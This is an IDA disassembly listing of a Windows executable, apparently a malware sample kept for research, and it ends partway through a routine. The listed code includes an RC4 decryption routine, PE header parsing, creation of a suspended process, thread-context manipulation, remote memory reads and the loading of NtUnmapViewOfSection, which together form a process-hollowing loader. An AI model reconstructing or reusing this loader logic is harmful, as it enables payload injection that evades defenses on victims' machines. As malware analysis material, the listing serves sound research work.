;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : BCDF9CCD486E95FA45730B2E6517DFF9
; File Name : u:\work\bcdf9ccd486e95fa45730b2e6517dff9_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00002121 ( 8481.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401050+14�p
; sub_4012B0+15�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push edi
mov eax, [ebp+arg_0]
imul eax, [ebp+arg_4]
push eax ; dwBytes
push 0 ; uFlags
call ds:GlobalAlloc ; GlobalAlloc
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
imul ecx, [ebp+arg_0]
xor eax, eax
mov edi, [ebp+var_4]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov eax, [ebp+var_4]
pop edi
mov esp, ebp
pop ebp
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401040(HGLOBAL hMem)
sub_401040 proc near ; CODE XREF: sub_401A30+2A8�p
hMem = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+hMem]
push eax ; hMem
call ds:GlobalFree ; GlobalFree
pop ebp
retn
sub_401040 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401050 proc near ; CODE XREF: sub_402150+11�p
; sub_402150+49�p ...
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push edi
push 1
mov eax, [ebp+arg_8]
imul eax, 0Ah
push eax
call sub_401000
add esp, 8
mov [ebp+var_118], eax
cmp [ebp+var_118], 0
jnz short loc_401082
xor eax, eax
jmp loc_4012A8
; ---------------------------------------------------------------------------
loc_401082: ; CODE XREF: sub_401050+29�j
mov [ebp+var_114], 0
jmp short loc_40109D
; ---------------------------------------------------------------------------
loc_40108E: ; CODE XREF: sub_401050+6C�j
mov ecx, [ebp+var_114]
add ecx, 1
mov [ebp+var_114], ecx
loc_40109D: ; CODE XREF: sub_401050+3C�j
cmp [ebp+var_114], 0FFh
jg short loc_4010BE
mov edx, [ebp+var_114]
mov al, byte ptr [ebp+var_114]
mov [ebp+edx+var_100], al
jmp short loc_40108E
; ---------------------------------------------------------------------------
loc_4010BE: ; CODE XREF: sub_401050+57�j
mov [ebp+var_110], 0
mov [ebp+var_108], 0
jmp short loc_4010E3
; ---------------------------------------------------------------------------
loc_4010D4: ; CODE XREF: sub_401050+130�j
mov ecx, [ebp+var_108]
add ecx, 1
mov [ebp+var_108], ecx
loc_4010E3: ; CODE XREF: sub_401050+82�j
cmp [ebp+var_108], 0FFh
jg loc_401185
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov eax, [ebp+var_108]
xor edx, edx
div ecx
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax+edx]
mov edx, [ebp+var_108]
xor eax, eax
mov al, [ebp+edx+var_100]
mov edx, [ebp+var_110]
add edx, ecx
add eax, edx
and eax, 800000FFh
jns short loc_40113A
dec eax
or eax, 0FFFFFF00h
inc eax
loc_40113A: ; CODE XREF: sub_401050+E1�j
mov [ebp+var_110], eax
mov eax, [ebp+var_108]
mov cl, [ebp+eax+var_100]
mov [ebp+var_104], cl
mov edx, [ebp+var_108]
mov eax, [ebp+var_110]
mov cl, [ebp+eax+var_100]
mov [ebp+edx+var_100], cl
mov edx, [ebp+var_110]
mov al, [ebp+var_104]
mov [ebp+edx+var_100], al
jmp loc_4010D4
; ---------------------------------------------------------------------------
loc_401185: ; CODE XREF: sub_401050+9D�j
mov [ebp+var_108], 0
mov [ebp+var_110], 0
mov [ebp+var_108], 0
jmp short loc_4011B4
; ---------------------------------------------------------------------------
loc_4011A5: ; CODE XREF: sub_401050+24D�j
mov ecx, [ebp+var_108]
add ecx, 1
mov [ebp+var_108], ecx
loc_4011B4: ; CODE XREF: sub_401050+153�j
mov edx, [ebp+var_108]
cmp edx, [ebp+arg_8]
jge loc_4012A2
mov eax, [ebp+var_108]
and eax, 800000FFh
jns short loc_4011D7
dec eax
or eax, 0FFFFFF00h
inc eax
loc_4011D7: ; CODE XREF: sub_401050+17E�j
mov [ebp+var_10C], eax
mov ecx, [ebp+var_10C]
xor edx, edx
mov dl, [ebp+ecx+var_100]
add edx, [ebp+var_110]
and edx, 800000FFh
jns short loc_401202
dec edx
or edx, 0FFFFFF00h
inc edx
loc_401202: ; CODE XREF: sub_401050+1A8�j
mov [ebp+var_110], edx
mov eax, [ebp+var_10C]
mov cl, [ebp+eax+var_100]
mov [ebp+var_104], cl
mov edx, [ebp+var_10C]
mov eax, [ebp+var_110]
mov cl, [ebp+eax+var_100]
mov [ebp+edx+var_100], cl
mov edx, [ebp+var_110]
mov al, [ebp+var_104]
mov [ebp+edx+var_100], al
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_108]
movsx edx, byte ptr [ecx]
mov eax, [ebp+var_10C]
xor ecx, ecx
mov cl, [ebp+eax+var_100]
mov eax, [ebp+var_110]
xor ebx, ebx
mov bl, [ebp+eax+var_100]
add ecx, ebx
and ecx, 800000FFh
jns short loc_401284
dec ecx
or ecx, 0FFFFFF00h
inc ecx
loc_401284: ; CODE XREF: sub_401050+22A�j
xor eax, eax
mov al, [ebp+ecx+var_100]
xor edx, eax
mov ecx, [ebp+var_118]
add ecx, [ebp+var_108]
mov [ecx], dl
jmp loc_4011A5
; ---------------------------------------------------------------------------
loc_4012A2: ; CODE XREF: sub_401050+16D�j
mov eax, [ebp+var_118]
loc_4012A8: ; CODE XREF: sub_401050+2D�j
pop edi
pop ebx
mov esp, ebp
pop ebp
retn
sub_401050 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012B0 proc near ; CODE XREF: start+E3�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
shl eax, 4
mov [ebp+var_4], eax
push 1
mov ecx, [ebp+var_4]
push ecx
call sub_401000
add esp, 8
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4012DA
xor eax, eax
jmp short loc_401309
; ---------------------------------------------------------------------------
loc_4012DA: ; CODE XREF: sub_4012B0+24�j
lea edx, [ebp+var_8]
push edx
lea eax, [ebp+var_C]
push eax
push 2
call dword_40529C
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_10]
push edx
push 2
call dword_405288
mov eax, [ebp+var_10]
loc_401309: ; CODE XREF: sub_4012B0+28�j
mov esp, ebp
pop ebp
retn
sub_4012B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401310 proc near ; CODE XREF: sub_401330+15�p
; sub_401330+AC�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax-1]
xor edx, edx
div [ebp+arg_4]
imul eax, [ebp+arg_4]
pop ebp
retn
sub_401310 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401330 proc near ; CODE XREF: sub_401490+B2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 8
push esi
mov eax, [ebp+arg_8]
mov ecx, [eax+38h]
push ecx
mov edx, [ebp+arg_8]
mov eax, [edx+54h]
push eax
call sub_401310
add esp, 8
mov [ebp+var_4], eax
mov [ebp+var_8], 0
jmp short loc_401362
; ---------------------------------------------------------------------------
loc_401359: ; CODE XREF: sub_401330:loc_401480�j
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
loc_401362: ; CODE XREF: sub_401330+27�j
mov edx, [ebp+arg_8]
xor eax, eax
mov ax, [edx+6]
cmp [ebp+var_8], eax
jge loc_401485
mov ecx, [ebp+var_8]
imul ecx, 28h
mov edx, [ebp+var_8]
imul edx, 28h
mov eax, [ebp+arg_C]
mov ecx, [eax+ecx+14h]
mov eax, [ebp+arg_C]
add ecx, [eax+edx+10h]
cmp ecx, [ebp+arg_4]
jbe short loc_40139A
xor eax, eax
jmp loc_401488
; ---------------------------------------------------------------------------
loc_40139A: ; CODE XREF: sub_401330+61�j
mov ecx, [ebp+var_8]
imul ecx, 28h
mov edx, [ebp+arg_C]
cmp dword ptr [edx+ecx+0Ch], 0
jz short loc_401418
mov eax, [ebp+var_8]
imul eax, 28h
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+eax+8], 0
jz short loc_4013E9
mov edx, [ebp+arg_8]
mov eax, [edx+38h]
push eax
mov ecx, [ebp+var_8]
imul ecx, 28h
mov edx, [ebp+var_8]
imul edx, 28h
mov eax, [ebp+arg_C]
mov ecx, [eax+ecx+0Ch]
mov eax, [ebp+arg_C]
add ecx, [eax+edx+8]
push ecx
call sub_401310
add esp, 8
mov [ebp+var_4], eax
jmp short loc_401416
; ---------------------------------------------------------------------------
loc_4013E9: ; CODE XREF: sub_401330+88�j
mov ecx, [ebp+arg_8]
mov edx, [ecx+38h]
push edx
mov eax, [ebp+var_8]
imul eax, 28h
mov ecx, [ebp+var_8]
imul ecx, 28h
mov edx, [ebp+arg_C]
mov eax, [edx+eax+0Ch]
mov edx, [ebp+arg_C]
add eax, [edx+ecx+10h]
push eax
call sub_401310
add esp, 8
mov [ebp+var_4], eax
loc_401416: ; CODE XREF: sub_401330+B7�j
jmp short loc_401480
; ---------------------------------------------------------------------------
loc_401418: ; CODE XREF: sub_401330+78�j
mov eax, [ebp+var_8]
imul eax, 28h
mov ecx, [ebp+var_8]
imul ecx, 28h
mov edx, [ebp+arg_C]
mov esi, [ebp+arg_C]
mov eax, [edx+eax+8]
cmp eax, [esi+ecx+10h]
jnb short loc_40145B
mov ecx, [ebp+arg_8]
mov edx, [ecx+38h]
push edx
mov eax, [ebp+var_8]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov edx, [ecx+eax+8]
push edx
call sub_401310
add esp, 8
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
jmp short loc_401480
; ---------------------------------------------------------------------------
loc_40145B: ; CODE XREF: sub_401330+102�j
mov edx, [ebp+arg_8]
mov eax, [edx+38h]
push eax
mov ecx, [ebp+var_8]
imul ecx, 28h
mov edx, [ebp+arg_C]
mov eax, [edx+ecx+8]
push eax
call sub_401310
add esp, 8
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
loc_401480: ; CODE XREF: sub_401330:loc_401416�j
; sub_401330+129�j
jmp loc_401359
; ---------------------------------------------------------------------------
loc_401485: ; CODE XREF: sub_401330+3E�j
mov eax, [ebp+var_4]
loc_401488: ; CODE XREF: sub_401330+65�j
pop esi
mov esp, ebp
pop ebp
retn
sub_401330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401490 proc near ; CODE XREF: sub_401CF0+25�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 18h
push esi
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
cmp [ebp+arg_4], 40h
jnb short loc_4014AA
xor eax, eax
jmp loc_401779
; ---------------------------------------------------------------------------
loc_4014AA: ; CODE XREF: sub_401490+11�j
mov ecx, [ebp+var_18]
xor edx, edx
mov dx, [ecx]
cmp edx, 5A4Dh
jz short loc_4014C1
xor eax, eax
jmp loc_401779
; ---------------------------------------------------------------------------
loc_4014C1: ; CODE XREF: sub_401490+28�j
mov eax, [ebp+var_18]
mov ecx, [eax+3Ch]
add ecx, 0F8h
cmp [ebp+arg_4], ecx
jge short loc_4014D9
xor eax, eax
jmp loc_401779
; ---------------------------------------------------------------------------
loc_4014D9: ; CODE XREF: sub_401490+40�j
mov edx, [ebp+var_18]
mov eax, [ebp+var_18]
add eax, [edx+3Ch]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp dword ptr [ecx], 4550h
jz short loc_4014F7
xor eax, eax
jmp loc_401779
; ---------------------------------------------------------------------------
loc_4014F7: ; CODE XREF: sub_401490+5E�j
mov edx, [ebp+var_8]
xor eax, eax
mov ax, [edx+16h]
and eax, 2000h
test eax, eax
jnz short loc_40151F
xor ecx, ecx
test ecx, ecx
jnz short loc_40151F
mov edx, [ebp+var_8]
xor eax, eax
mov ax, [edx+14h]
cmp eax, 0E0h
jz short loc_401526
loc_40151F: ; CODE XREF: sub_401490+77�j
; sub_401490+7D�j
xor eax, eax
jmp loc_401779
; ---------------------------------------------------------------------------
loc_401526: ; CODE XREF: sub_401490+8D�j
mov ecx, [ebp+var_8]
add ecx, 0F8h
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+var_18]
push edx
call sub_401330
add esp, 10h
mov ecx, [ebp+arg_14]
mov [ecx], eax
mov edx, [ebp+arg_14]
cmp dword ptr [edx], 0
jnz short loc_40155E
xor eax, eax
jmp loc_401779
; ---------------------------------------------------------------------------
loc_40155E: ; CODE XREF: sub_401490+C5�j
push 40h
push 1000h
mov eax, [ebp+arg_14]
mov ecx, [eax]
push ecx
push 0
call dword_4052FC
mov edx, [ebp+arg_10]
mov [edx], eax
mov eax, [ebp+arg_10]
cmp dword ptr [eax], 0
jz loc_401774
mov ecx, [ebp+var_8]
mov edx, [ecx+54h]
mov [ebp+var_14], edx
mov [ebp+var_10], 0
jmp short loc_40159F
; ---------------------------------------------------------------------------
loc_401596: ; CODE XREF: sub_401490:loc_4015DF�j
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
loc_40159F: ; CODE XREF: sub_401490+104�j
mov ecx, [ebp+var_8]
xor edx, edx
mov dx, [ecx+6]
cmp [ebp+var_10], edx
jge short loc_4015E1
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+eax+14h], 0
jz short loc_4015DF
mov edx, [ebp+var_10]
imul edx, 28h
mov eax, [ebp+var_4]
mov ecx, [eax+edx+14h]
cmp ecx, [ebp+var_14]
jnb short loc_4015DF
mov edx, [ebp+var_10]
imul edx, 28h
mov eax, [ebp+var_4]
mov ecx, [eax+edx+14h]
mov [ebp+var_14], ecx
loc_4015DF: ; CODE XREF: sub_401490+12B�j
; sub_401490+13D�j
jmp short loc_401596
; ---------------------------------------------------------------------------
loc_4015E1: ; CODE XREF: sub_401490+11B�j
mov edx, [ebp+var_14]
push edx
mov eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_10]
mov edx, [ecx]
push edx
call sub_402910
add esp, 0Ch
mov eax, [ebp+arg_10]
mov ecx, [eax]
mov edx, [ebp+arg_10]
mov eax, [edx]
add eax, [ecx+3Ch]
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov edx, [ebp+arg_8]
mov eax, [edx]
add eax, 0F8h
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov edx, [ebp+arg_8]
mov eax, [edx]
mov ecx, [eax+38h]
push ecx
mov edx, [ebp+arg_8]
mov eax, [edx]
mov ecx, [eax+54h]
push ecx
call sub_401310
add esp, 8
mov edx, [ebp+arg_10]
mov ecx, [edx]
add ecx, eax
mov [ebp+var_C], ecx
mov [ebp+var_10], 0
jmp short loc_40164E
; ---------------------------------------------------------------------------
loc_401645: ; CODE XREF: sub_401490:loc_40176F�j
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
loc_40164E: ; CODE XREF: sub_401490+1B3�j
mov eax, [ebp+arg_8]
mov ecx, [eax]
xor edx, edx
mov dx, [ecx+6]
cmp [ebp+var_10], edx
jge loc_401774
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov edx, [ecx]
cmp dword ptr [edx+eax+0Ch], 0
jz short loc_40168B
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov edx, [ecx]
mov ecx, [ebp+arg_10]
mov ecx, [ecx]
add ecx, [edx+eax+0Ch]
mov [ebp+var_C], ecx
loc_40168B: ; CODE XREF: sub_401490+1E2�j
mov edx, [ebp+var_10]
imul edx, 28h
mov eax, [ebp+arg_C]
mov ecx, [eax]
cmp dword ptr [ecx+edx+10h], 0
jz loc_401746
mov edx, [ebp+var_10]
imul edx, 28h
mov eax, [ebp+arg_C]
mov ecx, [eax]
mov edx, [ecx+edx+10h]
push edx
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov edx, [ecx]
mov ecx, [ebp+var_18]
add ecx, [edx+eax+14h]
push ecx
mov edx, [ebp+var_C]
push edx
call sub_402910
add esp, 0Ch
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov edx, [ecx]
mov ecx, [ebp+var_10]
imul ecx, 28h
mov esi, [ebp+arg_C]
mov esi, [esi]
mov edx, [edx+eax+8]
cmp edx, [esi+ecx+10h]
jnb short loc_40171B
mov eax, [ebp+arg_8]
mov ecx, [eax]
mov edx, [ecx+38h]
push edx
mov eax, [ebp+var_10]
imul eax, 28h
mov ecx, [ebp+arg_C]
mov edx, [ecx]
mov eax, [edx+eax+10h]
push eax
call sub_401310
add esp, 8
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
jmp short loc_401744
; ---------------------------------------------------------------------------
loc_40171B: ; CODE XREF: sub_401490+25E�j
mov edx, [ebp+arg_8]
mov eax, [edx]
mov ecx, [eax+38h]
push ecx
mov edx, [ebp+var_10]
imul edx, 28h
mov eax, [ebp+arg_C]
mov ecx, [eax]
mov edx, [ecx+edx+8]
push edx
call sub_401310
add esp, 8
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
loc_401744: ; CODE XREF: sub_401490+289�j
jmp short loc_40176F
; ---------------------------------------------------------------------------
loc_401746: ; CODE XREF: sub_401490+20B�j
mov edx, [ebp+arg_8]
mov eax, [edx]
mov ecx, [eax+38h]
push ecx
mov edx, [ebp+var_10]
imul edx, 28h
mov eax, [ebp+arg_C]
mov ecx, [eax]
mov edx, [ecx+edx+8]
push edx
call sub_401310
add esp, 8
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
loc_40176F: ; CODE XREF: sub_401490:loc_401744�j
jmp loc_401645
; ---------------------------------------------------------------------------
loc_401774: ; CODE XREF: sub_401490+EE�j
; sub_401490+1CC�j
mov eax, 1
loc_401779: ; CODE XREF: sub_401490+15�j
; sub_401490+2C�j ...
pop esi
mov esp, ebp
pop ebp
retn
sub_401490 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401780 proc near ; CODE XREF: sub_4017A0+17�p
; sub_401A30:loc_401AFE�p
push ebp
mov ebp, esp
xor eax, eax
cmp dword_4052E0, 0
setnz al
pop ebp
retn
sub_401780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4017A0(LPCSTR lpString2)
sub_4017A0 proc near ; CODE XREF: sub_401A30+22�p
lpString1 = dword ptr -4
lpString2 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push edi
push 1
push 100h
call sub_401000
add esp, 8
mov [ebp+lpString1], eax
call sub_401780
test eax, eax
jz short loc_4017F0
mov ecx, 40h
xor eax, eax
mov edi, [ebp+lpString1]
rep stosd
push 100h
mov eax, [ebp+lpString1]
push eax
push 0
call dword_4052C0
mov ecx, [ebp+lpString2]
push ecx ; lpString2
mov edx, [ebp+lpString1]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
mov eax, [ebp+lpString1]
jmp short loc_4017F2
; ---------------------------------------------------------------------------
loc_4017F0: ; CODE XREF: sub_4017A0+1E�j
xor eax, eax
loc_4017F2: ; CODE XREF: sub_4017A0+4E�j
pop edi
mov esp, ebp
pop ebp
retn
sub_4017A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401800 proc near ; CODE XREF: sub_401A30+127�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp dword ptr [eax+0A0h], 0
jz short loc_401825
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+0A4h], 0
jz short loc_401825
mov [ebp+var_4], 1
jmp short loc_40182C
; ---------------------------------------------------------------------------
loc_401825: ; CODE XREF: sub_401800+E�j
; sub_401800+1A�j
mov [ebp+var_4], 0
loc_40182C: ; CODE XREF: sub_401800+23�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_401800 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401840 proc near ; CODE XREF: sub_401A30+16B�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_8]
sub ecx, [eax+34h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_4]
add eax, [edx+0A0h]
mov [ebp+var_4], eax
loc_401861: ; CODE XREF: sub_401840+99�j
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov eax, [ebp+var_4]
add edx, [eax+4]
test edx, edx
jz short loc_4018DB
mov ecx, [ebp+var_4]
add ecx, 8
mov [ebp+var_14], ecx
mov [ebp+var_10], 1
jmp short loc_40188B
; ---------------------------------------------------------------------------
loc_401882: ; CODE XREF: sub_401840+91�j
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
loc_40188B: ; CODE XREF: sub_401840+40�j
mov eax, [ebp+var_4]
mov ecx, [eax+4]
sub ecx, 8
shr ecx, 1
cmp [ebp+var_10], ecx
ja short loc_4018D3
xor edx, edx
test edx, edx
jz short loc_4018C8
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
add ecx, [eax]
mov edx, [ebp+var_14]
xor eax, eax
mov ax, [edx]
and eax, 0FFFh
add ecx, eax
mov [ebp+var_C], ecx
mov ecx, [ebp+var_C]
mov edx, [ecx]
add edx, [ebp+var_8]
mov eax, [ebp+var_C]
mov [eax], edx
loc_4018C8: ; CODE XREF: sub_401840+5F�j
mov ecx, [ebp+var_14]
add ecx, 2
mov [ebp+var_14], ecx
jmp short loc_401882
; ---------------------------------------------------------------------------
loc_4018D3: ; CODE XREF: sub_401840+59�j
mov edx, [ebp+var_14]
mov [ebp+var_4], edx
jmp short loc_401861
; ---------------------------------------------------------------------------
loc_4018DB: ; CODE XREF: sub_401840+2E�j
mov esp, ebp
pop ebp
retn
sub_401840 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018E0 proc near ; CODE XREF: sub_401A30+E9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], 0
push offset LibFileName ; "ntdll.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_401921
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_405294
neg eax
sbb eax, eax
inc eax
mov [ebp+var_4], eax
mov edx, [ebp+var_8]
push edx
call dword_405298
loc_401921: ; CODE XREF: sub_4018E0+1F�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4018E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401930 proc near ; CODE XREF: sub_401A30+6C�p
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_30 = byte ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 7Ch
push edi
mov ecx, 11h
xor eax, eax
lea edi, [ebp+var_74]
rep stosd
xor eax, eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov [ebp+var_74], 44h
lea ecx, [ebp+var_10]
push ecx
lea edx, [ebp+var_74]
push edx
push 0
push 0
push 4
push 0
push 0
push 0
mov eax, [ebp+arg_0]
push eax
push 0
call dword_4052A8
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz loc_401A22
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_10]
mov [ecx], edx
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_C]
mov [eax], ecx
mov edx, [ebp+arg_10]
mov eax, [ebp+var_8]
mov [edx], eax
mov ecx, [ebp+arg_4]
mov dword ptr [ecx], 10007h
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_C]
mov ecx, [eax]
push ecx
call dword_40528C
lea edx, [ebp+var_78]
push edx
push 4
mov eax, [ebp+arg_14]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+0A4h]
add edx, 8
push edx
mov eax, [ebp+arg_8]
mov ecx, [eax]
push ecx
call dword_4052AC
mov edx, [ebp+arg_14]
mov eax, [edx]
mov [ebp+var_7C], eax
loc_4019E1: ; CODE XREF: sub_401930+E3�j
push 1Ch
lea ecx, [ebp+var_30]
push ecx
mov edx, [ebp+var_7C]
push edx
mov eax, [ebp+arg_8]
mov ecx, [eax]
push ecx
call dword_4052B4
test eax, eax
jz short loc_401A15
mov [ebp+var_20], 10000h
cmp [ebp+var_20], 0
jz short loc_401A0A
jmp short loc_401A15
; ---------------------------------------------------------------------------
loc_401A0A: ; CODE XREF: sub_401930+D6�j
mov edx, [ebp+var_7C]
add edx, [ebp+var_24]
mov [ebp+var_7C], edx
jmp short loc_4019E1
; ---------------------------------------------------------------------------
loc_401A15: ; CODE XREF: sub_401930+C9�j
; sub_401930+D8�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_7C]
sub ecx, [eax]
mov edx, [ebp+arg_18]
mov [edx], ecx
loc_401A22: ; CODE XREF: sub_401930+4F�j
mov eax, [ebp+var_14]
pop edi
mov esp, ebp
pop ebp
retn
sub_401930 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401A30(LPCSTR lpString2, int, int, int, int, int)
sub_401A30 proc near ; CODE XREF: sub_401CF0+49�p
var_2E8 = byte ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
hMem = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_230 = dword ptr -230h
var_224 = dword ptr -224h
var_8 = dword ptr -8
var_4 = dword ptr -4
lpString2 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
